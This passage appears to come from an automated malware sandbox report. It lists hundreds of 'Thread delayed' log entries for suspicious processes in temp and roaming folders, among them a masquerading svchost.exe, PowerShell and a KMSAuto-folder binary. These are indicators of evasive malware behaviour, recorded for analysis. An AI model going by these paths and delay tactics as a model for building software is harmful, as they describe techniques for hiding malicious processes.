                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 577734
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 577484
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 577341
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 577125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576937
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576703
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576468
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576318
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 575937
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 575781
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 575627
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 599641
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 599359
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 599031
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 598495
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 598168
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597947
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597734
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597453
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597281
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597031
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 99765
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 99328
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 99125
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 98967
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 98786
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 98609
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 98421
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 595184
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 594953
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 594775
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 594615
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 99359
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 99171
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 99026
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 98843
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 98640
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 599672
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 599532
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 599101
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 598875
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 598610
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 598328
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 598026
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 597719
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 597453
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 597125
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 596500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 596078
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 595625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 595110
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 594360
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 593922
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 593500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 593047
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 592766
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 592438
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 591907
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 591610
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 591313
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 591105
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 590891
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 590575
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 590328
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 589985
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 589413
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 589194
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588911
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588672
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588489
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588281
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588047
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 587813
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 587625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 587391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 587172
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586953
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586719
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586557
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586359
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586177
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585984
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585824
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585172
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584946
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584782
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584531
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584032
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 583794
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 583594
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 583450
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 583188
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582969
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582324
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582125
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 581844
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 581625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 581297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580961
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580750
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580578
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580102
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579910
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579705
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579250
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579028
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 578688
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 578499
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 578203
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 577938
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 577656
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 577344
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 577094
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 576844
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 576563
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 576282
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 576057
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 575797
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 575578
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 575352
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 575078
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 574813
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 574532
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 574281
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 574047
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573891
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573700
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573250
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573016
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 572828
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 572625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 572375
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 572125
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571938
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571709
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571219
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571016
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 570813
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 570594
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 570297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569907
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569422
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569227
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569016
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 568779
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 568618
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 568406
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 568208
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 567719
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 567438
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 567226
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 567031
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566857
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566690
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566496
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566305
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566031
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 565828
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 565625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 565391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 565183
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564891
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564688
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564514
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564078
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 563844
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 563328
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 563123
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 562906
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 562688
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 562391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 562195
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561985
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561516
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561078
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560860
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560656
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560282
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560032
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 559828
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 559632
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 559419
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 559235
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558907
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558657
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558266
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558016
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 557837
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 557608
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 557391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 557141
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 556907
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 556500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 556297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 556094
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 555797
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 555563
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 555364
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 555172
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 554974
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 554789
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 554610
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 554382
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 553953
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 553691
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 553422
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 553199
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 552938
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 552735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 552531
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 552282
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 551735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 551485
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 551281
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 551063
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 550858
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 550703
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 550484
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 550172
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 549969
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 549610
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 549141
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 548906
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 548703
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 548469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 548266
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 547938
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 547735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 547422
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 546906
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 546594
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 546266
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 545969
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 545500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 545188
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 544500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 544198
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 543828
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\KMSAuto\accc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 599719
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 599453
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 599265
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 598734
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 598453
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 598255
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 598000
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 597781
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 597590
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 597344
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 597170
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 596906
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 596765
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 596219
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 596062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595875
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595656
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595490
